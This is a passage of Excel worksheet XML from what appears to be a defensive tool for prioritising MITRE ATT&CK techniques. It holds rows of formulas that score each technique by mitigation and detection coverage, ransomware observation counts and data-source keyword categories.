        <f t="array" ref="AI132">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD132)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ132" s="37">
        <v>128</v>
      </c>
      <c r="AK132" s="37" t="str" cm="1">
        <f t="array" ref="AK132">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD132)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL132" s="37">
        <v>128</v>
      </c>
      <c r="AM132" s="37" t="str" cm="1">
        <f t="array" ref="AM132">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD132)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN132" s="37">
        <v>0</v>
      </c>
      <c r="AO132" s="37">
        <v>1</v>
      </c>
      <c r="AP132" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ132" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>43.971428571428568</v>
      </c>
      <c r="AR132" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS132" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT132" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU13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1.0707482993197277</v>
      </c>
    </row>
    <row r="133" spans="1:47" ht="51">
      <c r="A133" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B133" s="37">
        <f t="shared" ref="B133:B196" si="2">SUM(H133,M133,V133)*(1+SUM(AF133,AH133,AJ133,AL133,AN133))</f>
        <v>54.161904761904765</v>
      </c>
      <c r="C133" s="37" t="s">
        <v>486</v>
      </c>
      <c r="D133" s="50" t="s">
        <v>479</v>
      </c>
      <c r="E133" s="37" t="s">
        <v>487</v>
      </c>
      <c r="F133" s="37">
        <v>1</v>
      </c>
      <c r="G133" s="37">
        <v>1</v>
      </c>
      <c r="H133" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I133" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J133" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K133" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L133" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M133" s="37">
        <v>0</v>
      </c>
      <c r="N133" s="56">
        <v>0</v>
      </c>
      <c r="O133" s="56">
        <v>0</v>
      </c>
      <c r="P133" s="56">
        <v>0</v>
      </c>
      <c r="Q133" s="56">
        <v>1</v>
      </c>
      <c r="R133" s="57"/>
      <c r="S133" s="57">
        <v>0</v>
      </c>
      <c r="T133" s="57"/>
      <c r="U133" s="57">
        <v>0</v>
      </c>
      <c r="V133" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W133" s="37">
        <v>0</v>
      </c>
      <c r="X133" s="37">
        <v>0</v>
      </c>
      <c r="Y133" s="37">
        <v>0</v>
      </c>
      <c r="Z133" s="37">
        <v>1</v>
      </c>
      <c r="AA133" s="37">
        <v>0.01</v>
      </c>
      <c r="AB133" s="37">
        <v>0.01</v>
      </c>
      <c r="AC133" s="37"/>
      <c r="AD133" s="50" t="s">
        <v>480</v>
      </c>
      <c r="AE133" s="37" t="str" cm="1">
        <f t="array" ref="AE133">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD133)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF133" s="37">
        <v>129</v>
      </c>
      <c r="AG133" s="37" t="str" cm="1">
        <f t="array" ref="AG133">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD133)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH133" s="37">
        <v>129</v>
      </c>
      <c r="AI133" s="37" t="str" cm="1">
        <f t="array" ref="AI133">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD133)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ133" s="37">
        <v>129</v>
      </c>
      <c r="AK133" s="37" t="str" cm="1">
        <f t="array" ref="AK133">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD133)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL133" s="37">
        <v>129</v>
      </c>
      <c r="AM133" s="37" t="str" cm="1">
        <f t="array" ref="AM133">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD133)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN133" s="37">
        <v>0</v>
      </c>
      <c r="AO133" s="37">
        <v>0</v>
      </c>
      <c r="AP133" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ133" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>18.053968253968254</v>
      </c>
      <c r="AR133" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS133" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT133" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU13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34" spans="1:47" ht="153">
      <c r="A134" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="B134" s="37">
        <f t="shared" si="2"/>
        <v>675.24515119047612</v>
      </c>
      <c r="C134" s="37" t="s">
        <v>488</v>
      </c>
      <c r="D134" s="50" t="s">
        <v>489</v>
      </c>
      <c r="E134" s="37"/>
      <c r="F134" s="37">
        <v>1</v>
      </c>
      <c r="G134" s="37">
        <v>1</v>
      </c>
      <c r="H134" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I134" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J134" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K134" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L134" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M134" s="37">
        <v>0.59605600000000003</v>
      </c>
      <c r="N134" s="56">
        <v>0</v>
      </c>
      <c r="O134" s="56">
        <v>13</v>
      </c>
      <c r="P134" s="56">
        <v>14</v>
      </c>
      <c r="Q134" s="56">
        <v>23</v>
      </c>
      <c r="R134" s="57" t="s">
        <v>490</v>
      </c>
      <c r="S134" s="57">
        <v>17</v>
      </c>
      <c r="T134" s="57" t="s">
        <v>491</v>
      </c>
      <c r="U134" s="57">
        <v>21</v>
      </c>
      <c r="V134" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.59999995238095238</v>
      </c>
      <c r="W134" s="37">
        <v>38</v>
      </c>
      <c r="X134" s="37">
        <v>0.690909</v>
      </c>
      <c r="Y134" s="37">
        <v>0.690909</v>
      </c>
      <c r="Z134" s="37">
        <v>50</v>
      </c>
      <c r="AA134" s="37">
        <v>0.5</v>
      </c>
      <c r="AB134" s="37">
        <v>0.5</v>
      </c>
      <c r="AC134" s="37"/>
      <c r="AD134" s="50" t="s">
        <v>492</v>
      </c>
      <c r="AE134" s="37" t="str" cm="1">
        <f t="array" ref="AE134">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD134)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF134" s="37">
        <v>130</v>
      </c>
      <c r="AG134" s="37" t="str" cm="1">
        <f t="array" ref="AG134">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD134)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH134" s="37">
        <v>130</v>
      </c>
      <c r="AI134" s="37" t="str" cm="1">
        <f t="array" ref="AI134">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD134)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ134" s="37">
        <v>130</v>
      </c>
      <c r="AK134" s="37" t="str" cm="1">
        <f t="array" ref="AK134">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD134)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL134" s="37">
        <v>130</v>
      </c>
      <c r="AM134" s="37" t="str" cm="1">
        <f t="array" ref="AM134">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD134)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN134" s="37">
        <v>0</v>
      </c>
      <c r="AO134" s="37">
        <v>3</v>
      </c>
      <c r="AP134" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="AQ134" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>225.08171706349205</v>
      </c>
      <c r="AR134" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS134" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AT134" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AU13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16.148694075963718</v>
      </c>
    </row>
    <row r="135" spans="1:47" ht="34">
      <c r="A135" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B135" s="37">
        <f t="shared" si="2"/>
        <v>289.99997500000001</v>
      </c>
      <c r="C135" s="37" t="s">
        <v>493</v>
      </c>
      <c r="D135" s="50" t="s">
        <v>489</v>
      </c>
      <c r="E135" s="37" t="s">
        <v>494</v>
      </c>
      <c r="F135" s="37">
        <v>1</v>
      </c>
      <c r="G135" s="37">
        <v>1</v>
      </c>
      <c r="H135" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I135" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J135" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K135" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L135" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M135" s="37">
        <v>0</v>
      </c>
      <c r="N135" s="56">
        <v>2</v>
      </c>
      <c r="O135" s="56">
        <v>8</v>
      </c>
      <c r="P135" s="56">
        <v>3</v>
      </c>
      <c r="Q135" s="56">
        <v>6</v>
      </c>
      <c r="R135" s="57" t="s">
        <v>490</v>
      </c>
      <c r="S135" s="57">
        <v>17</v>
      </c>
      <c r="T135" s="57" t="s">
        <v>491</v>
      </c>
      <c r="U135" s="57">
        <v>21</v>
      </c>
      <c r="V135" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.45238090476190479</v>
      </c>
      <c r="W135" s="37">
        <v>38</v>
      </c>
      <c r="X135" s="37">
        <v>0.690909</v>
      </c>
      <c r="Y135" s="37">
        <v>0.690909</v>
      </c>
      <c r="Z135" s="37">
        <v>19</v>
      </c>
      <c r="AA135" s="37">
        <v>0.19</v>
      </c>
      <c r="AB135" s="37">
        <v>0.19</v>
      </c>
      <c r="AC135" s="37"/>
      <c r="AD135" s="50" t="s">
        <v>495</v>
      </c>
      <c r="AE135" s="37" t="str" cm="1">
        <f t="array" ref="AE135">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD135)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF135" s="37">
        <v>131</v>
      </c>
      <c r="AG135" s="37" t="str" cm="1">
        <f t="array" ref="AG135">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD135)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH135" s="37">
        <v>131</v>
      </c>
      <c r="AI135" s="37" t="str" cm="1">
        <f t="array" ref="AI135">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD135)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ135" s="37">
        <v>131</v>
      </c>
      <c r="AK135" s="37" t="str" cm="1">
        <f t="array" ref="AK135">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD135)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL135" s="37">
        <v>131</v>
      </c>
      <c r="AM135" s="37" t="str" cm="1">
        <f t="array" ref="AM135">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD135)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN135" s="37">
        <v>0</v>
      </c>
      <c r="AO135" s="37">
        <v>0</v>
      </c>
      <c r="AP135" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ135" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>96.666658333333331</v>
      </c>
      <c r="AR135" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS135" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT135" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU13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36" spans="1:47" ht="34">
      <c r="A136" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B136" s="37">
        <f t="shared" si="2"/>
        <v>249.38563871428568</v>
      </c>
      <c r="C136" s="37" t="s">
        <v>496</v>
      </c>
      <c r="D136" s="50" t="s">
        <v>489</v>
      </c>
      <c r="E136" s="37" t="s">
        <v>497</v>
      </c>
      <c r="F136" s="37">
        <v>1</v>
      </c>
      <c r="G136" s="37">
        <v>1</v>
      </c>
      <c r="H136" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I136" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J136" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K136" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L136" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M136" s="37">
        <v>0</v>
      </c>
      <c r="N136" s="56">
        <v>0</v>
      </c>
      <c r="O136" s="56">
        <v>3</v>
      </c>
      <c r="P136" s="56">
        <v>1</v>
      </c>
      <c r="Q136" s="56">
        <v>0</v>
      </c>
      <c r="R136" s="57" t="s">
        <v>498</v>
      </c>
      <c r="S136" s="57">
        <v>16</v>
      </c>
      <c r="T136" s="57" t="s">
        <v>491</v>
      </c>
      <c r="U136" s="57">
        <v>21</v>
      </c>
      <c r="V136" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.37142842857142855</v>
      </c>
      <c r="W136" s="37">
        <v>37</v>
      </c>
      <c r="X136" s="37">
        <v>0.67272699999999996</v>
      </c>
      <c r="Y136" s="37">
        <v>0.67272699999999996</v>
      </c>
      <c r="Z136" s="37">
        <v>4</v>
      </c>
      <c r="AA136" s="37">
        <v>0.04</v>
      </c>
      <c r="AB136" s="37">
        <v>0.04</v>
      </c>
      <c r="AC136" s="37"/>
      <c r="AD136" s="50" t="s">
        <v>472</v>
      </c>
      <c r="AE136" s="37" t="str" cm="1">
        <f t="array" ref="AE136">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD136)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF136" s="37">
        <v>132</v>
      </c>
      <c r="AG136" s="37" t="str" cm="1">
        <f t="array" ref="AG136">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD136)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH136" s="37">
        <v>132</v>
      </c>
      <c r="AI136" s="37" t="str" cm="1">
        <f t="array" ref="AI136">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD136)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ136" s="37">
        <v>132</v>
      </c>
      <c r="AK136" s="37" t="str" cm="1">
        <f t="array" ref="AK136">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD136)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL136" s="37">
        <v>132</v>
      </c>
      <c r="AM136" s="37" t="str" cm="1">
        <f t="array" ref="AM136">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD136)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN136" s="37">
        <v>0</v>
      </c>
      <c r="AO136" s="37">
        <v>0</v>
      </c>
      <c r="AP136" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ136" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>83.128546238095225</v>
      </c>
      <c r="AR136" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS136" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT136" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU13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37" spans="1:47" ht="51">
      <c r="A137" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B137" s="37">
        <f t="shared" si="2"/>
        <v>159.89997461904758</v>
      </c>
      <c r="C137" s="37" t="s">
        <v>499</v>
      </c>
      <c r="D137" s="50" t="s">
        <v>489</v>
      </c>
      <c r="E137" s="37" t="s">
        <v>500</v>
      </c>
      <c r="F137" s="37">
        <v>1</v>
      </c>
      <c r="G137" s="37">
        <v>1</v>
      </c>
      <c r="H137" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I137" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J137" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K137" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L137" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M137" s="37">
        <v>0</v>
      </c>
      <c r="N137" s="56">
        <v>1</v>
      </c>
      <c r="O137" s="56">
        <v>7</v>
      </c>
      <c r="P137" s="56">
        <v>2</v>
      </c>
      <c r="Q137" s="56">
        <v>0</v>
      </c>
      <c r="R137" s="57" t="s">
        <v>501</v>
      </c>
      <c r="S137" s="57">
        <v>6</v>
      </c>
      <c r="T137" s="57" t="s">
        <v>502</v>
      </c>
      <c r="U137" s="57">
        <v>10</v>
      </c>
      <c r="V137" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.19999995238095236</v>
      </c>
      <c r="W137" s="37">
        <v>16</v>
      </c>
      <c r="X137" s="37">
        <v>0.29090899999999997</v>
      </c>
      <c r="Y137" s="37">
        <v>0.29090899999999997</v>
      </c>
      <c r="Z137" s="37">
        <v>10</v>
      </c>
      <c r="AA137" s="37">
        <v>0.1</v>
      </c>
      <c r="AB137" s="37">
        <v>0.1</v>
      </c>
      <c r="AC137" s="37"/>
      <c r="AD137" s="50" t="s">
        <v>503</v>
      </c>
      <c r="AE137" s="37" t="str" cm="1">
        <f t="array" ref="AE137">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD137)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF137" s="37">
        <v>133</v>
      </c>
      <c r="AG137" s="37" t="str" cm="1">
        <f t="array" ref="AG137">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD137)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH137" s="37">
        <v>133</v>
      </c>
      <c r="AI137" s="37" t="str" cm="1">
        <f t="array" ref="AI137">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD137)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ137" s="37">
        <v>133</v>
      </c>
      <c r="AK137" s="37" t="str" cm="1">
        <f t="array" ref="AK137">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD137)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL137" s="37">
        <v>133</v>
      </c>
      <c r="AM137" s="37" t="str" cm="1">
        <f t="array" ref="AM137">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD137)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN137" s="37">
        <v>0</v>
      </c>
      <c r="AO137" s="37">
        <v>0</v>
      </c>
      <c r="AP137" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ137" s="37">
